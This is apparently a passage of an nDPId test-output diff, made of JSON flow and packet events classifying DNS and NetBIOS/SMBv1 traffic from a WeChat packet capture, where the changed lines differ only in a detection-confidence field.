-00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1651,"source":"wechat.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171268427,"flow_last_seen":1492171268427,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1492171268427,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":42074,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"ssl.gstatic.com.lan","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1651,"source":"wechat.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171268427,"flow_last_seen":1492171268427,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1492171268427,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":42074,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"ssl.gstatic.com.lan","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
01072{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1653,"source":"wechat.pcap","alias":"nDPId-test","flow_id":85,"flow_packet_id":3,"flow_last_seen":1492171268600,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":506,"pkt_l4_len":472,"thread_ts_msec":1492171268600,"pkt":"8IQvSpdgeJKcD6iOCABFAAHsiFdAAEAGSOfAqAFn2DrNg+MfAbtA+v0gFZsbqIAZAT5BhgAAAQEICgA\/qcQy2r7tFwMDAVu+DrsMGADIBc3y\/EPKacgY\/\/yQnIvMDmcJvSRFqPEzGFHK1SfEZD+LW3zHqz7Qn57h7phszvLaMx08coFwWwqfC7HwO5byX8EfZX59ZxB8wie5NmTqPueQB2i63JLDDRRwIsZojgu7bb8cvUD8n10qxsHw\/TQ7hvwnvUlAMmevC0E4bShoN6nD161aFH8pJzOUZ6Inmm16pW110QaYPjjSQQTv7tNyG48jYK3I2RN01WazUewIpPm73LAS9ZABJ\/Ny8oNO\/paZaboPssOjLQcJQCoLWCEO29VIR1wHqlyW4rcdBB9JM36yEvABpD0B99LA+t3vBjUOLhPnYTS5Tg\/Xq\/y13A\/nE4U69mAQajAphd1rkHRmU5H71D9Yn3KgSrb0XGlqT0xKmBjYerOwAP2kk8Whxm\/8laMcKMQksDAjrijAvnUEJ5tIwpNFUcxgRKcVbexJ8LEa9dte0xcDAwAh3EhrcW9cp9\/WX9UiN8Kt\/CmhJWgGaSyh5LdY3zetl0V+FwMDAC1uKRpL0WFRctIQnQp7DT13au9uAW\/kc9Ado7SqH0KYC9BoecHEhGyhydVqz38="} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1654,"source":"wechat.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171268754,"flow_last_seen":1492171268754,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1492171268754,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":43705,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1654,"source":"wechat.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":1,"flow_last_seen":1492171268754,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1492171268754,"pkt":"8IQvSpdgeJKcD6iOCABFAABIJm1AAEARj4LAqAFnwKgB\/qq5ADUANAzJFXEBAAABAAAAAAAAB3dlYnB1c2gDd2ViBndlY2hhdANjb20DbGFuAAABAAE="} -00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1654,"source":"wechat.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171268754,"flow_last_seen":1492171268754,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1492171268754,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":43705,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"webpush.web.wechat.com.lan","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1654,"source":"wechat.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171268754,"flow_last_seen":1492171268754,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1492171268754,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":43705,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"webpush.web.wechat.com.lan","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1657,"source":"wechat.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171269383,"flow_last_seen":1492171269383,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1492171269383,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":44063,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1657,"source":"wechat.pcap","alias":"nDPId-test","flow_id":103,"flow_packet_id":1,"flow_last_seen":1492171269383,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1492171269383,"pkt":"8IQvSpdgeJKcD6iOCABFAABDJn9AAEARj3XAqAFnwKgB\/qwfADUALz4De5MBAAABAAAAAAAAATEGZGViaWFuBHBvb2wDbnRwA29yZwAAAQAB"} -00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1657,"source":"wechat.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171269383,"flow_last_seen":1492171269383,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1492171269383,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":44063,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.debian.pool.ntp.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1657,"source":"wechat.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171269383,"flow_last_seen":1492171269383,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1492171269383,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":44063,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.debian.pool.ntp.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1658,"source":"wechat.pcap","alias":"nDPId-test","flow_id":103,"flow_packet_id":2,"flow_last_seen":1492171269383,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1492171269383,"pkt":"8IQvSpdgeJKcD6iOCABFAABDJoBAAEARj3TAqAFnwKgB\/qwfADUAL2b9N5kBAAABAAAAAAAAATEGZGViaWFuBHBvb2wDbnRwA29yZwAAHAAB"} -00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1658,"source":"wechat.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492171269383,"flow_last_seen":1492171269383,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":78,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1492171269383,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":44063,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"1.debian.pool.ntp.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1658,"source":"wechat.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492171269383,"flow_last_seen":1492171269383,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":78,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1492171269383,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":44063,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.debian.pool.ntp.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1659,"source":"wechat.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171269548,"flow_last_seen":1492171269548,"flow_idle_time":200000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":0,"thread_ts_msec":1492171269548,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00733{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1659,"source":"wechat.pcap","alias":"nDPId-test","flow_id":104,"flow_packet_id":1,"flow_last_seen":1492171269548,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":254,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":254,"pkt_l4_len":220,"thread_ts_msec":1492171269548,"pkt":"\/\/\/\/\/\/\/\/0CeIF3AECABFoADwL\/IAAIARhLfAqAFkwKgB\/wCKAIoA3H89EQ7\/KMCoAWQAigDGAAAgRUhFSkVQRkdFQkVPRU9FSkNORkFFRENBQ0FDQUNBQUEAIEFCQUNGUEZQRU5GREVDRkNFUEZIRkRFRkZQRlBBQ0FCAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAALAAAAAAAAAAAAOgDAAAAAAAAAAAsAFYAAwABAAEAAgA9AFxNQUlMU0xPVFxCUk9XU0UADACguw0AV09SS0dST1VQAAAAAAAAAAMKABAAgP4HAABHSU9WQU5OSS1QQwA="} -00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1659,"source":"wechat.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171269548,"flow_last_seen":1492171269548,"flow_idle_time":200000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":0,"thread_ts_msec":1492171269548,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 
+00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1659,"source":"wechat.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171269548,"flow_last_seen":1492171269548,"flow_idle_time":200000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":0,"thread_ts_msec":1492171269548,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1660,"source":"wechat.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":2,"flow_last_seen":1492171269750,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1492171269750,"pkt":"8IQvSpdgeJKcD6iOCABFAABEJttAAEARjxjAqAFnwKgB\/rE2ADUAMGKHk6IBAAABAAAAAAAAB3dlYnB1c2gDd2ViBndlY2hhdANjb20AAAEAAQ=="} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1661,"source":"wechat.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171270418,"flow_last_seen":1492171270418,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1492171270418,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":42589,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1661,"source":"wechat.pcap","alias":"nDPId-test","flow_id":105,"flow_packet_id":1,"flow_last_seen":1492171270418,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1492171270418,"pkt":"8IQvSpdgeJKcD6iOCABFAAA9Ju1AAEARjw3AqAFnwKgB\/qZdADUAKRuahlUBAAABAAAAAAAAA3NzbAdnc3RhdGljA2NvbQAAAQAB"} -00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1661,"source":"wechat.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171270418,"flow_last_seen":1492171270418,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1492171270418,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":42589,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"ssl.gstatic.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1661,"source":"wechat.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171270418,"flow_last_seen":1492171270418,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1492171270418,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":42589,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": 
{"query":"ssl.gstatic.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1664,"source":"wechat.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":2,"flow_last_seen":1492171273433,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1492171273433,"pkt":"8IQvSpdgeJKcD6iOCABFAABBJ9JAAEARjiTAqAFnwKgB\/qRaADUALSfRFz8BAAABAAAAAAAAA3NzbAdnc3RhdGljA2NvbQNsYW4AAAEAAQ=="} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1665,"source":"wechat.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":2,"flow_last_seen":1492171273759,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1492171273759,"pkt":"8IQvSpdgeJKcD6iOCABFAABIKB1AAEARjdLAqAFnwKgB\/qq5ADUANAzJFXEBAAABAAAAAAAAB3dlYnB1c2gDd2ViBndlY2hhdANjb20DbGFuAAABAAE="} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1666,"source":"wechat.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171274388,"flow_last_seen":1492171274388,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1492171274388,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":42856,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1666,"source":"wechat.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":1,"flow_last_seen":1492171274388,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"thread_ts_msec":1492171274388,"pkt":"8IQvSpdgeJKcD6iOCABFAABHKHpAAEARjXbAqAFnwKgB\/qdoADUAMwYVU1YBAAABAAAAAAAAATEGZGViaWFuBHBvb2wDbnRwA29yZwNsYW4AAAEAAQ=="} -00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1666,"source":"wechat.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171274388,"flow_last_seen":1492171274388,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1492171274388,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":42856,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.debian.pool.ntp.org.lan","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1666,"source":"wechat.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171274388,"flow_last_seen":1492171274388,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1492171274388,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":42856,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"1.debian.pool.ntp.org.lan","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1667,"source":"wechat.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":2,"flow_last_seen":1492171274388,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"thread_ts_msec":1492171274388,"pkt":"8IQvSpdgeJKcD6iOCABFAABHKHtAAEARjXXAqAFnwKgB\/qdoADUAMwU2OTUBAAABAAAAAAAAATEGZGViaWFuBHBvb2wDbnRwA29yZwNsYW4AABwAAQ=="} -00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1667,"source":"wechat.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492171274388,"flow_last_seen":1492171274388,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1492171274388,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":42856,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.debian.pool.ntp.org.lan","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1667,"source":"wechat.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492171274388,"flow_last_seen":1492171274388,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1492171274388,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":42856,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.debian.pool.ntp.org.lan","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1668,"source":"wechat.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171274755,"flow_last_seen":1492171274755,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1492171274755,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":44346,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1668,"source":"wechat.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":1,"flow_last_seen":1492171274755,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1492171274755,"pkt":"8IQvSpdgeJKcD6iOCABFAABIKKBAAEARjU\/AqAFnwKgB\/q06ADUANGSfuxkBAAABAAAAAAAAB3dlYnB1c2gDd2ViBndlY2hhdANjb20DbGFuAAABAAE="} 
-00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1668,"source":"wechat.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171274755,"flow_last_seen":1492171274755,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1492171274755,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":44346,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"webpush.web.wechat.com.lan","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1668,"source":"wechat.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171274755,"flow_last_seen":1492171274755,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1492171274755,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":44346,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"webpush.web.wechat.com.lan","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1669,"source":"wechat.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171290232,"flow_last_seen":1492171290232,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1492171290232,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":41759,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1669,"source":"wechat.pcap","alias":"nDPId-test","flow_id":108,"flow_packet_id":1,"flow_last_seen":1492171290232,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1492171290232,"pkt":"8IQvSpdgeJKcD6iOCABFAABDMahAAEARhEzAqAFnwKgB\/qMfADUAL3l8SRkBAAABAAAAAAAAATIGZGViaWFuBHBvb2wDbnRwA29yZwAAAQAB"} -00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1669,"source":"wechat.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171290232,"flow_last_seen":1492171290232,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1492171290232,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":41759,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 